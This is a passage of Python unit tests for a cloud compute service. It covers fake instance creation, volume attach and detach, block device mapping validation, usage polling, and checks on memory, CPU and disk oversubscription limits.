inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
inst['node'] = NODENAME
type_id = flavors.get_flavor_by_name(type_name)['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = 'x86_64'
inst['os_type'] = 'Linux'
inst['system_metadata'] = make_fake_sys_meta()
inst['locked'] = False
inst['created_at'] = timeutils.utcnow()
inst['updated_at'] = timeutils.utcnow()
inst['launched_at'] = timeutils.utcnow()
inst['security_groups'] = []
inst.update(params)
if services:
_create_service_entries(self.context.elevated(),
{'fake_zone': [inst['host']]})
return db.instance_create(self.context, inst)
def _objectify(self, db_inst):
return instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), db_inst,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS)
def _create_fake_instance_obj(self, params=None, type_name='m1.tiny'):
db_inst = self._create_fake_instance(params, type_name=type_name)
return self._objectify(db_inst)
def _create_instance_type(self, params=None):
"""Create a test instance type."""
if not params:
params = {}
context = self.context.elevated()
inst = {}
inst['name'] = 'm1.small'
inst['memory_mb'] = 1024
inst['vcpus'] = 1
inst['root_gb'] = 20
inst['ephemeral_gb'] = 10
inst['flavorid'] = '1'
inst['swap'] = 2048
inst['rxtx_factor'] = 1
inst.update(params)
return db.flavor_create(context, inst)['id']
def _create_group(self):
values = {'name': 'testgroup',
'description': 'testgroup',
'user_id': self.user_id,
'project_id': self.project_id}
return db.security_group_create(self.context, values)
def _stub_migrate_server(self):
def _fake_migrate_server(*args, **kwargs):
pass
self.stubs.Set(conductor_manager.ComputeTaskManager,
'migrate_server', _fake_migrate_server)
class ComputeVolumeTestCase(BaseTestCase):
def setUp(self):
super(ComputeVolumeTestCase, self).setUp()
self.volume_id = 'fake'
self.fetched_attempts = 0
self.instance = {
'id': 'fake',
'uuid': 'fake',
'name': 'fake',
'root_device_name': '/dev/vda',
}
self.stubs.Set(self.compute.volume_api, 'get', lambda *a, **kw:
{'id': self.volume_id})
self.stubs.Set(self.compute.driver, 'get_volume_connector',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'initialize_connection',
lambda *a, **kw: {})
self.stubs.Set(self.compute.volume_api, 'terminate_connection',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'attach',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'detach',
lambda *a, **kw: None)
self.stubs.Set(self.compute.volume_api, 'check_attach',
lambda *a, **kw: None)
def store_cinfo(context, *args):
self.cinfo = jsonutils.loads(args[-1].get('connection_info'))
self.stubs.Set(self.compute.conductor_api,
'block_device_mapping_update',
store_cinfo)
self.stubs.Set(self.compute.conductor_api,
'block_device_mapping_update_or_create',
store_cinfo)
def test_attach_volume_serial(self):
def fake_get_volume_encryption_metadata(self, context, volume_id):
return {}
self.stubs.Set(cinder.API, 'get_volume_encryption_metadata',
fake_get_volume_encryption_metadata)
instance = self._create_fake_instance()
self.compute.attach_volume(self.context, self.volume_id,
'/dev/vdb', instance)
self.assertEqual(self.cinfo.get('serial'), self.volume_id)
def test_await_block_device_created_to_slow(self):
def never_get(context, vol_id):
return {
'status': 'creating',
'id': 'blah',
}
self.stubs.Set(self.compute.volume_api, 'get', never_get)
self.assertRaises(exception.VolumeNotCreated,
self.compute._await_block_device_map_created,
self.context, '1', max_tries=2, wait_between=0.1)
def test_await_block_device_created_slow(self):
c = self.compute
def slow_get(context, vol_id):
while self.fetched_attempts < 2:
self.fetched_attempts += 1
return {
'status': 'creating',
'id': 'blah',
}
return {
'status': 'available',
'id': 'blah',
}
self.stubs.Set(c.volume_api, 'get', slow_get)
attempts = c._await_block_device_map_created(self.context, '1',
max_tries=4,
wait_between=0.1)
self.assertEqual(attempts, 3)
def test_boot_volume_serial(self):
block_device_mapping = [
block_device.BlockDeviceDict({
'id': 1,
'no_device': None,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': self.volume_id,
'device_name': '/dev/vdb',
'delete_on_termination': False,
})]
self.compute._prep_block_device(self.context, self.instance,
block_device_mapping)
self.assertEqual(self.cinfo.get('serial'), self.volume_id)
def test_boot_volume_metadata(self, metadata=True):
def volume_api_get(*args, **kwargs):
if metadata:
return {
'volume_image_metadata': {'vol_test_key': 'vol_test_value'}
}
else:
return {}
self.stubs.Set(self.compute_api.volume_api, 'get', volume_api_get)
block_device_mapping = [{
'id': 1,
'device_name': 'vda',
'no_device': None,
'virtual_name': None,
'snapshot_id': None,
'volume_id': self.volume_id,
'delete_on_termination': False,
}]
image_meta = self.compute_api._get_bdm_image_metadata(
self.context, block_device_mapping)
if metadata:
self.assertEqual(image_meta['vol_test_key'], 'vol_test_value')
else:
self.assertEqual(image_meta, {})
# Test it with new-style BDMs
block_device_mapping = [{
'boot_index': 0,
'source_type': 'volume',
'destination_type': 'volume',
'volume_id': self.volume_id,
'delete_on_termination': False,
}]
image_meta = self.compute_api._get_bdm_image_metadata(
self.context, block_device_mapping, legacy_bdm=False)
if metadata:
self.assertEqual(image_meta['vol_test_key'], 'vol_test_value')
else:
self.assertEqual(image_meta, {})
def test_boot_volume_no_metadata(self):
self.test_boot_volume_metadata(metadata=False)
def test_boot_image_metadata(self, metadata=True):
def image_api_show(*args, **kwargs):
if metadata:
return {
'properties': {'img_test_key': 'img_test_value'}
}
else:
return {}
self.stubs.Set(self.compute_api.image_service, 'show', image_api_show)
block_device_mapping = [{
'boot_index': 0,
'source_type': 'image',
'destination_type': 'local',
'image_id': "fake-image",
'delete_on_termination': True,
}]
image_meta = self.compute_api._get_bdm_image_metadata(
self.context, block_device_mapping, legacy_bdm=False)
if metadata:
self.assertEqual(image_meta['img_test_key'], 'img_test_value')
else:
self.assertEqual(image_meta, {})
def test_boot_image_no_metadata(self):
self.test_boot_image_metadata(metadata=False)
def test_poll_volume_usage_disabled(self):
ctxt = 'MockContext'
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
# None of the mocks should be called.
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 0
self.compute._poll_volume_usage(ctxt)
self.mox.UnsetStubs()
def test_poll_volume_usage_interval_not_elapsed(self):
ctxt = 'MockContext'
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
self.mox.StubOutWithMock(self.compute.driver, 'get_all_volume_usage')
self.mox.StubOutWithMock(time, 'time')
# Following methods will be called.
utils.last_completed_audit_period().AndReturn((0, 0))
time.time().AndReturn(10)
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 2
self.compute._last_vol_usage_poll = 9
self.compute._poll_volume_usage(ctxt)
self.mox.UnsetStubs()
def test_poll_volume_usage_returns_no_vols(self):
ctxt = 'MockContext'
self.compute.host = 'MockHost'
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
self.mox.StubOutWithMock(self.compute.driver, 'get_all_volume_usage')
# Following methods are called.
utils.last_completed_audit_period().AndReturn((0, 0))
self.compute._get_host_volume_bdms(ctxt, 'MockHost').AndReturn([])
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 10
self.compute._last_vol_usage_poll = 0
self.compute._poll_volume_usage(ctxt)
self.mox.UnsetStubs()
def test_poll_volume_usage_with_data(self):
ctxt = 'MockContext'
self.compute.host = 'MockHost'
curr_time = time.time()
self.mox.StubOutWithMock(utils, 'last_completed_audit_period')
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(self.compute, '_update_volume_usage_cache')
self.stubs.Set(self.compute.driver, 'get_all_volume_usage',
lambda x, y: [3, 4])
# All the mocks are called
utils.last_completed_audit_period().AndReturn((10, 20))
self.compute._get_host_volume_bdms(ctxt, 'MockHost').AndReturn([1, 2])
self.compute._update_volume_usage_cache(ctxt, [3, 4])
self.mox.ReplayAll()
CONF.volume_usage_poll_interval = 10
self.compute._last_vol_usage_poll = 0
self.compute._poll_volume_usage(ctxt)
self.assertTrue((curr_time < self.compute._last_vol_usage_poll),
"_last_vol_usage_poll was not properly updated <%s>" %
self.compute._last_vol_usage_poll)
self.mox.UnsetStubs()
def test_detach_volume_usage(self):
# Test that detach volume update the volume usage cache table correctly
instance = self._create_fake_instance()
bdm = {'id': 1,
'device_name': '/dev/vdb',
'connection_info': '{}',
'instance_uuid': instance['uuid'],
'volume_id': 1}
self.mox.StubOutWithMock(self.compute, '_get_instance_volume_bdm')
self.mox.StubOutWithMock(self.compute.driver, 'block_stats')
self.mox.StubOutWithMock(self.compute, '_get_host_volume_bdms')
self.mox.StubOutWithMock(self.compute.driver, 'get_all_volume_usage')
# The following methods will be called
self.compute._get_instance_volume_bdm(self.context, instance, 1).\
AndReturn(bdm)
self.compute.driver.block_stats(instance['name'], 'vdb').\
AndReturn([1L, 30L, 1L, 20L, None])
self.compute._get_host_volume_bdms(self.context, 'fake-mini').\
AndReturn(bdm)
self.compute.driver.get_all_volume_usage(self.context, bdm).\
AndReturn([{'volume': 1,
'rd_req': 1,
'rd_bytes': 10,
'wr_req': 1,
'wr_bytes': 5,
'instance': instance}])
self.mox.ReplayAll()
def fake_get_volume_encryption_metadata(self, context, volume_id):
return {}
self.stubs.Set(cinder.API, 'get_volume_encryption_metadata',
fake_get_volume_encryption_metadata)
self.compute.attach_volume(self.context, 1, '/dev/vdb', instance)
# Poll volume usage & then detach the volume. This will update the
# total fields in the volume usage cache.
CONF.volume_usage_poll_interval = 10
self.compute._poll_volume_usage(self.context)
# Check that a volume.usage and volume.attach notification was sent
self.assertEqual(2, len(fake_notifier.NOTIFICATIONS))
self.compute.detach_volume(self.context, 1, instance)
# Check that volume.attach, 2 volume.usage, and volume.detach
# notifications were sent
self.assertEquals(4, len(fake_notifier.NOTIFICATIONS))
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals('compute.instance.volume.attach', msg.event_type)
msg = fake_notifier.NOTIFICATIONS[2]
self.assertEquals('volume.usage', msg.event_type)
payload = msg.payload
self.assertEquals(instance['uuid'], payload['instance_id'])
self.assertEquals('fake', payload['user_id'])
self.assertEquals('fake', payload['tenant_id'])
self.assertEquals(1, payload['reads'])
self.assertEquals(30, payload['read_bytes'])
self.assertEquals(1, payload['writes'])
self.assertEquals(20, payload['write_bytes'])
self.assertEquals(None, payload['availability_zone'])
msg = fake_notifier.NOTIFICATIONS[3]
self.assertEquals('compute.instance.volume.detach', msg.event_type)
# Check the database for the
volume_usages = db.vol_get_usage_by_time(self.context, 0)
self.assertEqual(1, len(volume_usages))
volume_usage = volume_usages[0]
self.assertEqual(0, volume_usage['curr_reads'])
self.assertEqual(0, volume_usage['curr_read_bytes'])
self.assertEqual(0, volume_usage['curr_writes'])
self.assertEqual(0, volume_usage['curr_write_bytes'])
self.assertEqual(1, volume_usage['tot_reads'])
self.assertEqual(30, volume_usage['tot_read_bytes'])
self.assertEqual(1, volume_usage['tot_writes'])
self.assertEqual(20, volume_usage['tot_write_bytes'])
def test_prepare_image_mapping(self):
swap_size = 1
ephemeral_size = 1
instance_type = {'swap': swap_size,
'ephemeral_gb': ephemeral_size}
instance = self._create_fake_instance()
mappings = [
{'virtual': 'ami', 'device': 'sda1'},
{'virtual': 'root', 'device': '/dev/sda1'},
{'virtual': 'swap', 'device': 'sdb4'},
{'virtual': 'ephemeral0', 'device': 'sdc1'},
{'virtual': 'ephemeral1', 'device': 'sdc2'},
]
preped_bdm = self.compute_api._prepare_image_mapping(
instance_type, instance['uuid'], mappings)
expected_result = [
{
'device_name': '/dev/sdb4',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': 'swap',
'boot_index': -1,
'volume_size': swap_size
},
{
'device_name': '/dev/sdc1',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': CONF.default_ephemeral_format,
'boot_index': -1,
'volume_size': ephemeral_size
},
{
'device_name': '/dev/sdc2',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': CONF.default_ephemeral_format,
'boot_index': -1,
'volume_size': ephemeral_size
}
]
for expected, got in zip(expected_result, preped_bdm):
self.assertThat(expected, matchers.IsSubDictOf(got))
def test_validate_bdm(self):
def fake_get(self, context, res_id):
return {'id': res_id}
def fake_check_attach(*args, **kwargs):
pass
self.stubs.Set(cinder.API, 'get', fake_get)
self.stubs.Set(cinder.API, 'get_snapshot', fake_get)
self.stubs.Set(cinder.API, 'check_attach',
fake_check_attach)
volume_id = '55555555-aaaa-bbbb-cccc-555555555555'
snapshot_id = '66666666-aaaa-bbbb-cccc-555555555555'
instance = self._create_fake_instance()
instance_type = {'swap': 1, 'ephemeral_gb': 2}
mappings = [
{
'device_name': '/dev/sdb4',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': 'swap',
'boot_index': -1,
'volume_size': 1
},
{
'device_name': '/dev/sda1',
'source_type': 'volume',
'destination_type': 'volume',
'device_type': 'disk',
'volume_id': volume_id,
'guest_format': None,
'boot_index': 1,
'volume_size': 6
},
{
'device_name': '/dev/sda2',
'source_type': 'snapshot',
'destination_type': 'volume',
'snapshot_id': snapshot_id,
'device_type': 'disk',
'guest_format': None,
'boot_index': 0,
'volume_size': 4
},
{
'device_name': '/dev/sda3',
'source_type': 'image',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': None,
'boot_index': 2,
'volume_size': 1
}
]
# Make sure it passes at first
self.compute_api._validate_bdm(self.context, instance,
instance_type, mappings)
# Boot sequence
mappings[2]['boot_index'] = 2
self.assertRaises(exception.InvalidBDMBootSequence,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings)
mappings[2]['boot_index'] = 0
# number of local block_devices
self.flags(max_local_block_devices=1)
self.assertRaises(exception.InvalidBDMLocalsLimit,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings)
ephemerals = [
{
'device_name': '/dev/vdb',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'volume_id': volume_id,
'guest_format': None,
'boot_index': -1,
'volume_size': 1
},
{
'device_name': '/dev/vdc',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'volume_id': volume_id,
'guest_format': None,
'boot_index': -1,
'volume_size': 1
}]
self.flags(max_local_block_devices=4)
# More ephemerals are OK as long as they are not over the size limit
self.compute_api._validate_bdm(self.context, instance,
instance_type, mappings + ephemerals)
# Ephemerals over the size limit
ephemerals[0]['volume_size'] = 3
self.assertRaises(exception.InvalidBDMEphemeralSize,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings + ephemerals)
self.assertRaises(exception.InvalidBDMEphemeralSize,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings + [ephemerals[0]])
# Swap over the size limit
mappings[0]['volume_size'] = 3
self.assertRaises(exception.InvalidBDMSwapSize,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings)
mappings[0]['volume_size'] = 1
additional_swap = [
{
'device_name': '/dev/vdb',
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': 'swap',
'boot_index': -1,
'volume_size': 1
}]
# More than one swap
self.assertRaises(exception.InvalidBDMFormat,
self.compute_api._validate_bdm,
self.context, instance, instance_type,
mappings + additional_swap)
def test_validate_bdm_media_service_exceptions(self):
instance_type = {'swap': 1, 'ephemeral_gb': 1}
all_mappings = [{'id': 1,
'no_device': None,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': self.volume_id,
'device_name': 'vda',
'boot_index': 0,
'delete_on_termination': False}]
# Check that the volume status is 'available' and reject if not
def fake_volume_get_1(self, context, volume_id):
return {'id': volume_id,
'status': 'creating',
'attach_status': 'detached'}
self.stubs.Set(cinder.API, 'get', fake_volume_get_1)
self.assertRaises(exception.InvalidBDMVolume,
self.compute_api._validate_bdm,
self.context, self.instance,
instance_type, all_mappings)
# Check that the volume attach_status is 'detached' and reject if not
def fake_volume_get_2(self, context, volume_id):
return {'id': volume_id,
'status': 'available',
'attach_status': 'attached'}
self.stubs.Set(cinder.API, 'get', fake_volume_get_2)
self.assertRaises(exception.InvalidBDMVolume,
self.compute_api._validate_bdm,
self.context, self.instance,
instance_type, all_mappings)
# Check that the volume status is 'available' and attach_status is
# 'detached' and accept the request if so
def fake_volume_get_3(self, context, volume_id):
return {'id': volume_id,
'status': 'available',
'attach_status': 'detached'}
self.stubs.Set(cinder.API, 'get', fake_volume_get_3)
self.compute_api._validate_bdm(self.context, self.instance,
instance_type, all_mappings)
def test_volume_snapshot_create(self):
self.assertRaises(rpc_common.ClientException,
self.compute.volume_snapshot_create, self.context,
self.instance, 'fake_id', {})
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(NotImplementedError,
self.compute.volume_snapshot_create, self.context,
self.instance, 'fake_id', {})
def test_volume_snapshot_delete(self):
self.assertRaises(rpc_common.ClientException,
self.compute.volume_snapshot_delete, self.context,
self.instance, 'fake_id', 'fake_id2', {})
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(NotImplementedError,
self.compute.volume_snapshot_delete, self.context,
self.instance, 'fake_id', 'fake_id2', {})
class ComputeTestCase(BaseTestCase):
def test_wrap_instance_fault(self):
inst = {"uuid": "fake_uuid"}
called = {'fault_added': False}
def did_it_add_fault(*args):
called['fault_added'] = True
self.stubs.Set(compute_utils, 'add_instance_fault_from_exc',
did_it_add_fault)
@compute_manager.wrap_instance_fault
def failer(self2, context, instance):
raise NotImplementedError()
self.assertRaises(NotImplementedError, failer,
self.compute, self.context, instance=inst)
self.assertTrue(called['fault_added'])
def test_wrap_instance_fault_instance_in_args(self):
inst = {"uuid": "fake_uuid"}
called = {'fault_added': False}
def did_it_add_fault(*args):
called['fault_added'] = True
self.stubs.Set(compute_utils, 'add_instance_fault_from_exc',
did_it_add_fault)
@compute_manager.wrap_instance_fault
def failer(self2, context, instance):
raise NotImplementedError()
self.assertRaises(NotImplementedError, failer,
self.compute, self.context, inst)
self.assertTrue(called['fault_added'])
def test_wrap_instance_fault_no_instance(self):
inst_uuid = "fake_uuid"
called = {'fault_added': False}
def did_it_add_fault(*args):
called['fault_added'] = True
self.stubs.Set(compute_utils, 'add_instance_fault_from_exc',
did_it_add_fault)
@compute_manager.wrap_instance_fault
def failer(self2, context, instance_uuid):
raise exception.InstanceNotFound(instance_id=instance_uuid)
self.assertRaises(exception.InstanceNotFound, failer,
self.compute, self.context, inst_uuid)
self.assertFalse(called['fault_added'])
def test_wrap_instance_event(self):
inst = {"uuid": "fake_uuid"}
called = {'started': False,
'finished': False}
def did_it_update_start(self2, context, values):
called['started'] = True
def did_it_update_finish(self2, context, values):
called['finished'] = True
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_start', did_it_update_start)
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_finish', did_it_update_finish)
@compute_manager.wrap_instance_event
def fake_event(self, context, instance):
pass
fake_event(self.compute, self.context, instance=inst)
self.assertTrue(called['started'])
self.assertTrue(called['finished'])
def test_wrap_instance_event_log_exception(self):
inst = {"uuid": "fake_uuid"}
called = {'started': False,
'finished': False,
'message': ''}
def did_it_update_start(self2, context, values):
called['started'] = True
def did_it_update_finish(self2, context, values):
called['finished'] = True
called['message'] = values['message']
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_start', did_it_update_start)
self.stubs.Set(conductor_manager.ConductorManager,
'action_event_finish', did_it_update_finish)
@compute_manager.wrap_instance_event
def fake_event(self2, context, instance):
raise exception.NovaException()
self.assertRaises(exception.NovaException, fake_event,
self.compute, self.context, instance=inst)
self.assertTrue(called['started'])
self.assertTrue(called['finished'])
self.assertEqual('An unknown exception occurred.', called['message'])
def test_object_compat(self):
db_inst = fake_instance.fake_db_instance()
@compute_manager.object_compat
def test_fn(_self, context, instance):
self.assertIsInstance(instance, instance_obj.Instance)
self.assertEqual(instance.uuid, db_inst['uuid'])
test_fn(None, self.context, instance=db_inst)
def test_create_instance_with_img_ref_associates_config_drive(self):
# Make sure create associates a config drive.
instance = jsonutils.to_primitive(self._create_fake_instance(
params={'config_drive': '1234', }))
try:
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertTrue(instance['config_drive'])
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_create_instance_associates_config_drive(self):
# Make sure create associates a config drive.
instance = jsonutils.to_primitive(self._create_fake_instance(
params={'config_drive': '1234', }))
try:
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertTrue(instance['config_drive'])
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_create_instance_unlimited_memory(self):
# Default of memory limit=None is unlimited.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
params = {"memory_mb": 999999999999}
filter_properties = {'limits': {'memory_mb': None}}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(999999999999, self.rt.compute_node['memory_mb_used'])
def test_create_instance_unlimited_disk(self):
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
params = {"root_gb": 999999999999,
"ephemeral_gb": 99999999999}
filter_properties = {'limits': {'disk_gb': None}}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
def test_create_multiple_instances_then_starve(self):
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
filter_properties = {'limits': {'memory_mb': 4096, 'disk_gb': 1000}}
params = {"memory_mb": 1024, "root_gb": 128, "ephemeral_gb": 128}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEquals(1024, self.rt.compute_node['memory_mb_used'])
self.assertEquals(256, self.rt.compute_node['local_gb_used'])
params = {"memory_mb": 2048, "root_gb": 256, "ephemeral_gb": 256}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEquals(3072, self.rt.compute_node['memory_mb_used'])
self.assertEquals(768, self.rt.compute_node['local_gb_used'])
params = {"memory_mb": 8192, "root_gb": 8192, "ephemeral_gb": 8192}
instance = self._create_fake_instance(params)
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_multiple_instance_with_neutron_port(self):
instance_type = flavors.get_default_flavor()
def fake_is_neutron():
return True
self.stubs.Set(utils, 'is_neutron', fake_is_neutron)
self.assertRaises(exception.MultiplePortsNotApplicable,
self.compute_api.create,
self.context,
instance_type=instance_type,
image_href=None,
max_count=2,
requested_networks=[(None, None, 'adadds')])
def test_create_instance_with_oversubscribed_ram(self):
# Test passing of oversubscribed ram policy from the scheduler.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_mem_mb = resources['memory_mb']
oversub_limit_mb = total_mem_mb * 1.5
instance_mb = int(total_mem_mb * 1.45)
# build an instance, specifying an amount of memory that exceeds
# total_mem_mb, but is less than the oversubscribed limit:
params = {"memory_mb": instance_mb, "root_gb": 128,
"ephemeral_gb": 128}
instance = self._create_fake_instance(params)
limits = {'memory_mb': oversub_limit_mb}
filter_properties = {'limits': limits}
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(instance_mb, self.rt.compute_node['memory_mb_used'])
def test_create_instance_with_oversubscribed_ram_fail(self):
"""Test passing of oversubscribed ram policy from the scheduler, but
with insufficient memory.
"""
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_mem_mb = resources['memory_mb']
oversub_limit_mb = total_mem_mb * 1.5
instance_mb = int(total_mem_mb * 1.55)
# build an instance, specifying an amount of memory that exceeds
# total_mem_mb, but is less than the oversubscribed limit:
params = {"memory_mb": instance_mb, "root_gb": 128,
"ephemeral_gb": 128}
instance = self._create_fake_instance(params)
filter_properties = {'limits': {'memory_mb': oversub_limit_mb}}
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_instance_with_oversubscribed_cpu(self):
# Test passing of oversubscribed cpu policy from the scheduler.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
limits = {'vcpu': 3}
filter_properties = {'limits': limits}
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
self.assertEqual(1, resources['vcpus'])
# build an instance, specifying an amount of memory that exceeds
# total_mem_mb, but is less than the oversubscribed limit:
params = {"memory_mb": 10, "root_gb": 1,
"ephemeral_gb": 1, "vcpus": 2}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(2, self.rt.compute_node['vcpus_used'])
# create one more instance:
params = {"memory_mb": 10, "root_gb": 1,
"ephemeral_gb": 1, "vcpus": 1}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(3, self.rt.compute_node['vcpus_used'])
# delete the instance:
instance['vm_state'] = vm_states.DELETED
self.rt.update_usage(self.context,
instance=instance)
self.assertEqual(2, self.rt.compute_node['vcpus_used'])
# now oversubscribe vcpus and fail:
params = {"memory_mb": 10, "root_gb": 1,
"ephemeral_gb": 1, "vcpus": 2}
instance = self._create_fake_instance(params)
limits = {'vcpu': 3}
filter_properties = {'limits': limits}
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_instance_with_oversubscribed_disk(self):
# Test passing of oversubscribed disk policy from the scheduler.
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_disk_gb = resources['local_gb']
oversub_limit_gb = total_disk_gb * 1.5
instance_gb = int(total_disk_gb * 1.45)
# build an instance, specifying an amount of disk that exceeds
# total_disk_gb, but is less than the oversubscribed limit:
params = {"root_gb": instance_gb, "memory_mb": 10}
instance = self._create_fake_instance(params)
limits = {'disk_gb': oversub_limit_gb}
filter_properties = {'limits': limits}
self.compute.run_instance(self.context, instance=instance,
filter_properties=filter_properties)
self.assertEqual(instance_gb, self.rt.compute_node['local_gb_used'])
def test_create_instance_with_oversubscribed_disk_fail(self):
"""Test passing of oversubscribed disk policy from the scheduler, but
with insufficient disk.
"""
self.flags(reserved_host_disk_mb=0, reserved_host_memory_mb=0)
self.rt.update_available_resource(self.context.elevated())
# get total memory as reported by virt driver:
resources = self.compute.driver.get_available_resource(NODENAME)
total_disk_gb = resources['local_gb']
oversub_limit_gb = total_disk_gb * 1.5
instance_gb = int(total_disk_gb * 1.55)
# build an instance, specifying an amount of disk that exceeds
# total_disk_gb, but is less than the oversubscribed limit:
params = {"root_gb": instance_gb, "memory_mb": 10}
instance = self._create_fake_instance(params)
limits = {'disk_gb': oversub_limit_gb}
filter_properties = {'limits': limits}
self.assertRaises(exception.ComputeResourcesUnavailable,
self.compute.run_instance, self.context, instance=instance,
filter_properties=filter_properties)
def test_create_instance_without_node_param(self):
instance = self._create_fake_instance({'node': None})
self.compute.run_instance(self.context, instance=instance)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertEqual(NODENAME, instance['node'])
def test_create_instance_no_image(self):
# Create instance with no image provided.
params = {'image_ref': ''}
instance = self._create_fake_instance(params)
self.compute.run_instance(self.context, instance=instance)
self._assert_state({'vm_state': vm_states.ACTIVE,
'task_state': None})
def test_default_access_ip(self):
self.flags(default_access_ip_network_name='test1')
fake_network.unset_stub_network_methods(self.stubs)
instance = jsonutils.to_primitive(self._create_fake_instance())
orig_update = self.compute._instance_update
# Make sure the access_ip_* updates happen in the same DB
# update as the set to ACTIVE.
def _instance_update(ctxt, instance_uuid, **kwargs):
if kwargs.get('vm_state', None) == vm_states.ACTIVE:
self.assertEqual(kwargs['access_ip_v4'], '192.168.1.100')
self.assertEqual(kwargs['access_ip_v6'], '2001:db8:0:1::1')
return orig_update(ctxt, instance_uuid, **kwargs)
self.stubs.Set(self.compute, '_instance_update', _instance_update)
try:
self.compute.run_instance(self.context, instance=instance,
is_first_time=True)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertEqual(instance['access_ip_v4'], '192.168.1.100')
self.assertEqual(instance['access_ip_v6'], '2001:db8:0:1::1')
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_no_default_access_ip(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
try:
self.compute.run_instance(self.context, instance=instance,
is_first_time=True)
instances = db.instance_get_all(self.context)
instance = instances[0]
self.assertFalse(instance['access_ip_v4'])
self.assertFalse(instance['access_ip_v6'])
finally:
db.instance_destroy(self.context, instance['uuid'])
def test_fail_to_schedule_persists(self):
# check the persistence of the ERROR(scheduling) state.
params = {'vm_state': vm_states.ERROR,
'task_state': task_states.SCHEDULING}
self._create_fake_instance(params=params)
#check state is failed even after the periodic poll
self.compute.periodic_tasks(context.get_admin_context())
self._assert_state({'vm_state': vm_states.ERROR,
'task_state': task_states.SCHEDULING})
def test_run_instance_setup_block_device_mapping_fail(self):
"""block device mapping failure test.
Make sure that when there is a block device mapping problem,
